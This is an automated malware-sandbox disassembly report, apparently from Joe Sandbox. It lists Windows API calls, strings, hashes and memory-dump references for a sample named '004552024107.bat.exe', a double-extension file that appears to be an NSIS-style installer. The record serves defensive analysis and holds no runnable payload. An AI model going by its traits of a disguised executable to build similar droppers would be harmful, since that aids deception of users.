                                          • Part of subcall function 00404362: SendMessageA.USER32(00000028,?,?,00404192), ref: 00404370
                                        • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404F48
                                        • GetWindowLongA.USER32(?,000000F0), ref: 00404F76
                                        • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404F84
                                        • ShowWindow.USER32(?,00000005), ref: 00404F94
                                        • SendMessageA.USER32(?,00000419,00000000,?), ref: 0040508F
                                        • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004050F4
                                        • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00405109
                                        • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 0040512D
                                        • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 0040514D
                                        • ImageList_Destroy.COMCTL32(?), ref: 00405162
                                        • GlobalFree.KERNEL32(?), ref: 00405172
                                        • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 004051EB
                                        • SendMessageA.USER32(?,00001102,?,?), ref: 00405294
                                        • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 004052A3
                                        • InvalidateRect.USER32(?,00000000,?), ref: 004052CE
                                        • ShowWindow.USER32(?,00000000), ref: 0040531C
                                        • GetDlgItem.USER32(?,000003FE), ref: 00405327
                                        • ShowWindow.USER32(00000000), ref: 0040532E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 2564846305-813528018
                                        • Opcode ID: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction ID: b1cb089e499fd84ad02b8b6dcb50706d58213328e80d7969948961eab3192630
                                        • Opcode Fuzzy Hash: 4df1eefe35e68a6c7fa34c5b60be6288f9ea88f6771e326f729b6c61956ac8d6
                                        • Instruction Fuzzy Hash: B1027DB0A00609AFDF209F94DD45AAE7BB5FB44354F50817AFA10BA2E1C7789D42CF58
                                        APIs
                                        • CheckDlgButton.USER32(00000000,-0000040A,?), ref: 00404523
                                        • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                        • SendMessageA.USER32(00000000,0000045B,?,00000000), ref: 00404555
                                        • GetSysColor.USER32(?), ref: 00404566
                                        • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                        • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                        • lstrlenA.KERNEL32(?), ref: 00404587
                                        • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                        • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                        • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                        • SendMessageA.USER32(00000000), ref: 00404610
                                        • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                        • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                        • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                        • SetCursor.USER32(00000000), ref: 00404693
                                        • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                        • SetCursor.USER32(00000000), ref: 004046AC
                                        • SendMessageA.USER32(00000111,?,00000000), ref: 004046D8
                                        • SendMessageA.USER32(00000010,00000000,00000000), ref: 004046EC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                        • String ID: Call$N$cD@
                                        • API String ID: 3103080414-3938186718
                                        • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                        • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                        • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                        APIs
                                        • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                        • BeginPaint.USER32(?,?), ref: 00401047
                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                        • DeleteObject.GDI32(?), ref: 004010ED
                                        • CreateFontIndirectA.GDI32(?), ref: 00401105
                                        • SetBkMode.GDI32(00000000,?), ref: 00401126
                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                        • DrawTextA.USER32(00000000,Haftaras12 Setup,000000FF,00000010,00000820), ref: 00401156
                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                        • DeleteObject.GDI32(?), ref: 00401165
                                        • EndPaint.USER32(?,?), ref: 0040116E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                        • String ID: F$Haftaras12 Setup
                                        • API String ID: 941294808-2545943586
                                        • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                        • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                        • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                        APIs
                                        • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                        • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                          • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                        • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                        • wsprintfA.USER32 ref: 00405F6B
                                        • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,00000004,0042C618,?,?,?,?,?), ref: 00405FA6
                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405FB5
                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                        • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                        • GlobalFree.KERNEL32(00000000), ref: 00406054
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                          • Part of subcall function 00405E20: GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\004552024107.bat.exe,80000000,00000003,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E24
                                          • Part of subcall function 00405E20: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,?,00403722,?,?,00000008,0000000A,0000000C), ref: 00405E46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                        • String ID: %s=%s$[Rename]
                                        • API String ID: 2171350718-1727408572
                                        • Opcode ID: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                        • Opcode Fuzzy Hash: 569be3a98da05520ad95d37df462ccc6378b119762144e883bf0616c118c920a
                                        • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                        APIs
                                        • CharNextA.USER32(0000000C,*?|<>/":,00000000,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065DF
                                        • CharNextA.USER32(0000000C,0000000C,0000000C,00000000,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065EC
                                        • CharNextA.USER32(0000000C,?,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 004065F1
                                        • CharPrevA.USER32(0000000C,0000000C,757B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\004552024107.bat.exe",004033B3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036B5,?,00000008,0000000A,0000000C), ref: 00406601
                                        Strings
                                        • *?|<>/":, xrefs: 004065CF
                                        • "C:\Users\user\Desktop\004552024107.bat.exe", xrefs: 00406587
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406588
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Char$Next$Prev
                                        • String ID: "C:\Users\user\Desktop\004552024107.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                        • API String ID: 589700163-3743087337
                                        • Opcode ID: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction ID: 9f335943bb0e62a209881404c60ffb6aa99012b8199ff17f999404b9432e9d26
                                        • Opcode Fuzzy Hash: 5d1a13f5f6d1e26a5c928a636a6cd85ce9cfe8cb66a926baf99f252f8cb630c3
                                        • Instruction Fuzzy Hash: 871104618053923DFB3216282C44B777F894F97760F1A007FE5C2722C6CA7C5C62966D
                                        APIs
                                        • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                        • GetSysColor.USER32(00000000), ref: 004043EF
                                        • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                        • SetBkMode.GDI32(?,?), ref: 00404407
                                        • GetSysColor.USER32(?), ref: 0040441A
                                        • SetBkColor.GDI32(?,?), ref: 0040442A
                                        • DeleteObject.GDI32(?), ref: 00404444
                                        • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                        • String ID:
                                        • API String ID: 2320649405-0
                                        • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                        • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                        • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                        APIs
                                          • Part of subcall function 6C6012A5: GlobalAlloc.KERNEL32(00000040,6C6012C3,?,6C60135F,-6C60504B,6C6011C0,-000000A0), ref: 6C6012AD
                                        • GlobalFree.KERNEL32(?), ref: 6C60266E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86267191150.000000006C601000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C600000, based on PE: true
                                        • Associated: 00000000.00000002.86267155201.000000006C600000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267225002.000000006C604000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000000.00000002.86267260674.000000006C606000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_6c600000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID:
                                        • API String ID: 3394109436-0
                                        • Opcode ID: 050261d673d4eaec3b9229d357ac2c869b6dd83cc57940f2dadd234e74204541
                                        • Instruction ID: f158904f1e4bf6f6b14f3138ac45192fb1eb915cc8320e2d7b611eb3b57f4b06
                                        • Opcode Fuzzy Hash: 050261d673d4eaec3b9229d357ac2c869b6dd83cc57940f2dadd234e74204541
                                        • Instruction Fuzzy Hash: DF318B72709240EFDB198F55CAC8C6E77BAEF86304F04452DF542B7A11C73198098B6D
                                        APIs
                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                        • GetMessagePos.USER32 ref: 00404CA3
                                        • ScreenToClient.USER32(?,?), ref: 00404CBD
                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Message$Send$ClientScreen
                                        • String ID: f
                                        • API String ID: 41195575-1993550816
                                        • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                        • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                        • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                        APIs
                                        • GetDC.USER32(?), ref: 00401E5D
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E77
                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E7F
                                        • ReleaseDC.USER32(?,00000000), ref: 00401E90
                                        • CreateFontIndirectA.GDI32(0040B830), ref: 00401EDF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                        • String ID: Tahoma
                                        • API String ID: 3808545654-3580928618
                                        • Opcode ID: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                        • Instruction ID: 3235dfa2473664f3223cdf9cba53c0ab50ba273bd9661b34cbd5463b8b999ac8
                                        • Opcode Fuzzy Hash: 0466c2d66d8f018793a5193256bc33b363c7409b941099693a26df1913abae86
                                        • Instruction Fuzzy Hash: FE017572504344AFE7107B60AE49B9E3FF8E715701F10897AF181B62F2CB7800058B6D
                                        APIs
                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E65
                                        • MulDiv.KERNEL32(0008197A,00000064,0008197E), ref: 00402E90
                                        • wsprintfA.USER32 ref: 00402EA0
                                        • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                        • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                        • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                        • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040286E
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040288A
                                        • GlobalFree.KERNEL32(?), ref: 004028C9
                                        • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028F8
                                        • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040290B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244704100.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_004552024107.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                        • Instruction ID: f5f6ffd272893f167dd8362f30c9a288e23aa0477cfe19fc00766ec7197ba147
                                        • Opcode Fuzzy Hash: f2f5004db618060fe317ee0d1003544e1a2fa323f5e59acd3a511c365c814511
                                        • Instruction Fuzzy Hash: EA319E32C00124BBEF216FA5CE48D9E7A79EF04364F10823AF554B72E1CB7949419FA8
                                        APIs
                                        • GetDlgItem.USER32(?,?), ref: 00401DA3
                                        • GetClientRect.USER32(?,?), ref: 00401DF1
                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E21
                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E35
                                        • DeleteObject.GDI32(00000000), ref: 00401E45
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.86244331382.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.86244308132.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244357420.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.86244383117.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
